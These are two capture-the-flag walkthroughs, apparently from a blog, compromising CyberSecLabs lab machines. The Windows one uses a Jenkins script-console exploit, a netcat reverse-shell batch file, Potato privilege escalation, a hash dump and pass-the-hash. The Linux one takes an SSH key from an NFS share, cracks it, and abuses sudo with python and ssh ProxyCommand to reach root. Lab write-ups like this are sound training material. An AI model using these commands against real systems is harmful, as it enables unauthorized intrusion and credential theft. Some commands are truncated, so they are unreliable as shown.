Browsing around the console and doing some clicking around, I have no idea what the hell I am looking for. I see a script console and this starts to stir up some evil thoughts on how I can exploit this thing. Did some googling and sure enough I found a Metasploit module that allows us to exploit this bad boy using Java code execution. This exploit can also be done manually without using Metasploit’s spoon feeding by throwing in commands to execute in the console.


Let’s now fire up Metasploit from our terminal and use the exploit module following the commands in order:

use exploit/multi/http/jenkins_script_console
set RPORT 8080
set TARGETURI /script/
set USERNAME admin
set PASSWORD admin

by default this module  likes to use reverse_https payload for our reverse connection back. I switched to reverse_tcp for consistency.

set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT 7777

Now it starts to exploit giving us back a meterpreter session. I typed the command shell for a detailed shell.

C:\Users\ben\Desktop>type access.txt
type access.txt

Step 3: Post Exploitation

I ran to see if this thing was vulnerable to the Juicy Potato exploit

C:\Users\ben\Desktop>whoami /priv
whoami /priv


Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


We can see that SeImpersonatePrivilege is Enabled. This means we can use the famous Juicy Potato attack.

I found a Juicy Potato exploit module for Metasploit. While still in the basic command shell, press Ctrl-Z to background the session. Hit Y if it asks you to background it.

We are now dropped back to the main Metasploit prompt, and we can verify any sessions we have running in the background with the sessions command:

We can now then load the Juicy Potato exploit module using the following commands:

use exploit/windows/local/ms16_075_reflection_juicy
set LHOST <your ip>

Sadly not working for me..

So We first transfer the juicy potato binary on our victim machine. You can get it from here. We also transfer nc.exe(Netcat for windows) to the victim machine.

c:\users\ben>certutil -urlcache -split -f nc.exe

Juicy Potato also requires CLSID as an argument. You can find the list of CLSID for your OS version on the github repo of Juicy Potato. Using the ‘systeminfo’ command we can see that the machine is running Windows server 2012.

Next, we create a batch file, having the following contents.

echo nc.exe -e cmd.exe 1337 > rev.bat

This simply means that when rev.bat is run, it will connect to our local machine using nc.exe .

Now, we use juicy potato. But before that let’s set up a netcat listener on our local machine.

Running Juicy potato now,

c:\puck\juicy.exe -p c:\Users\ben\rev.bat -t * -l 6666 -c {e60687f7–01a1–40aa-86ac-db1cbf673334}


  • -p : Program to launch

Once this is completed, we get a shell back on our machine as NT Authority\system.

again not for me

c:\puck>juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
juicy.exe -p c:\puck\rev.bat -t * -l 6666 -c {e60687f701a140aa-86ac-db1cbf673334}
Testing {e60687f701a140aa-86ac-db1cbf673334} 6666
COM -> recv failed with error: 10038

let’s go rotten

meterpreter > upload /tmp/rottenpotato.exe .
[*] uploading : /tmp/rottenpotato.exe -> .
[*] uploaded : /tmp/rottenpotato.exe -> .\rottenpotato.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > execute -Hc -f rottenpotato.exe
Process 952 created.
Channel 3 created.
meterpreter > execute -Hc -f rottenpotato.exe
Process 1952 created.
Channel 4 created.
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

 Volume in drive C has no label.
 Volume Serial Number is 7863-44CF

 Directory of c:\Users\Administrator\Desktop

05/16/2020  01:26 PM    <DIR>          .
05/16/2020  01:26 PM    <DIR>          ..
05/19/2020  11:54 AM                32 system.txt
               1 File(s)             32 bytes
               2 Dir(s)   8,087,158,784 bytes free

type system.txt
c:\Users\Administrator\Desktop>^Z Background channel 5? [y/N] y meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223::: ben:1009:aad3b435b51404eeaad3b435b51404ee:e549e5d2b2bf452ba959520eb82bdeeb::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter >
kali@kali:~/cyberseclabs$ python3 -hashes aad3b435b51404eeaad3b435b51404ee:1c79999f468c6922c065724d95a18223 ad
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file fJyPgVRp.exe
[*] Opening SVCManager on
[*] Creating service srVS on
[*] Starting service srVS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname &&whoami
nt authority\system


Author – Puckiestyle


NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  CyberSecLabs Share at



kali@kali:~/cyberseclabs$ sudo nmap -p-
Starting Nmap 7.80 ( ) at 2020-06-24 09:49 EDT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for
Host is up (0.10s latency).
Not shown: 65526 closed ports
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
27853/tcp open unknown -> ssh
34971/tcp open unknown
36663/tcp open unknown
50727/tcp open unknown
56401/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 621.71 seconds


kali@kali:~/cyberseclabs$ mkdir /tmp/amir
kali@kali:~/cyberseclabs$ sudo mount -t nfs /tmp/amir
[sudo] password for kali:kali
kali@kali:~/cyberseclabs$ cd /tmp/amir
kali@kali:/tmp/amir$ ls -la
total 40
drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 .
drwxrwxrwt 14 root root 4096 Jun 25 10:01 ..
-rw-r--r-- 1 kali kali 0 Apr 2 11:46 .bash_history
-rw-r--r-- 1 kali kali 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 kali kali 3786 Apr 2 11:46 .bashrc
drw-r--r-- 2 kali kali 4096 Apr 2 10:44 .cache
drw-r--r-- 3 kali kali 4096 Apr 2 10:44 .gnupg
-rw-r--r-- 1 kali kali 807 Apr 4 2018 .profile
drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 .ssh
-rw-r--r-- 1 kali kali 0 Apr 2 10:47 .sudo_as_admin_successful
-rw-r--r-- 1 kali kali 7713 Apr 2 11:43 .viminfo
kali@kali:/tmp/amir$ cd .ssh
kali@kali:/tmp/amir/.ssh$ ls -la
total 24
drwxrwxr-x 2 kali kali 4096 Apr 2 11:20 .
drwxrwxr-x 5 kali kali 4096 Apr 2 11:43 ..
-r-------- 1 kali kali 393 Apr 2 11:12 authorized_keys
-r-------- 1 kali kali 1766 Apr 2 11:11 id_rsa
-rw-r--r-- 1 kali kali 1766 Apr 2 11:20 id_rsa.bak
-r-------- 1 kali kali 393 Apr 2 11:11
kali@kali:/tmp/amir/.ssh$ cat id_rsa
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,8D55B7449F8965162DA3B7F2F017FC21



kali@kali:~/cyberseclabs$ python id_rsa > id_rsa.hash 
kali@kali:~/cyberseclabs$ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hello6 (id_rsa)
1g 0:00:00:10 DONE (2020-06-25 10:08) 0.09157g/s 1313Kp/s 1313Kc/s 1313KC/sa6_123..*7¡Vamos!
Session completed

(SSH port different. Port number is 27853)

kali@kali:~/cyberseclabs$ ssh -i id_rsa amir@ -p 27853
Enter passphrase for key 'id_rsa':hello6
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

* Documentation:
* Management:
* Support:

System information as of Thu Jun 25 13:59:46 UTC 2020

System load: 0.0 Processes: 105
Usage of /: 39.2% of 9.78GB Users logged in: 0
Memory usage: 34% IP address for eth0:
Swap usage: 0%

21 packages can be updated.
0 updates are security updates.

Failed to connect to Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Thu Jun 25 13:00:51 2020 from

access.txt file not include amir files, try first sudo -l command

amir@shares:/tmp$ sudo -l
Matching Defaults entries for amir on shares:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User amir may run the following commands on shares:
    (ALL : ALL) ALL
    (amy) NOPASSWD: /usr/bin/pkexec
    (amy) NOPASSWD: /usr/bin/python3

amir@shares:/home$ sudo -u amy /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
amy@shares:/home$ ls
amir amy
amy@shares:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Apr 2 15:28 .
drwxr-xr-x 24 root root 4096 Apr 2 14:34 ..
drwxrwxr-x 5 amir amir 4096 Apr 2 15:43 amir
drwxr-xr-- 2 amy amy 4096 Apr 2 15:41 amy
amy@shares:/home$ cd amy
amy@shares:/home/amy$ ls
amy@shares:/home/amy$ ls
amy@shares:/home/amy$ cat access.txt


amy@shares:/home/amy$ sudo -l
Matching Defaults entries for amy on shares:
env_reset, mail_badpass,

User amy may run the following commands on shares:
(ALL) NOPASSWD: /usr/bin/ssh
amy@shares:/home/amy$ sudo /usr/bin/ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
# bash
root@shares:/home/amy# cd /root
root@shares:/root# ls -la
total 28
drwx------ 3 root root 4096 Apr 2 15:39 .
drwxr-xr-x 24 root root 4096 Apr 2 14:34 ..
-rw------- 1 root root 78 Apr 2 15:46 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Apr 2 14:43 .ssh
-rw-r--r-- 1 root root 33 Apr 2 15:39 system.txt
root@shares:/root# cat system.txt

Author – Puckiestyle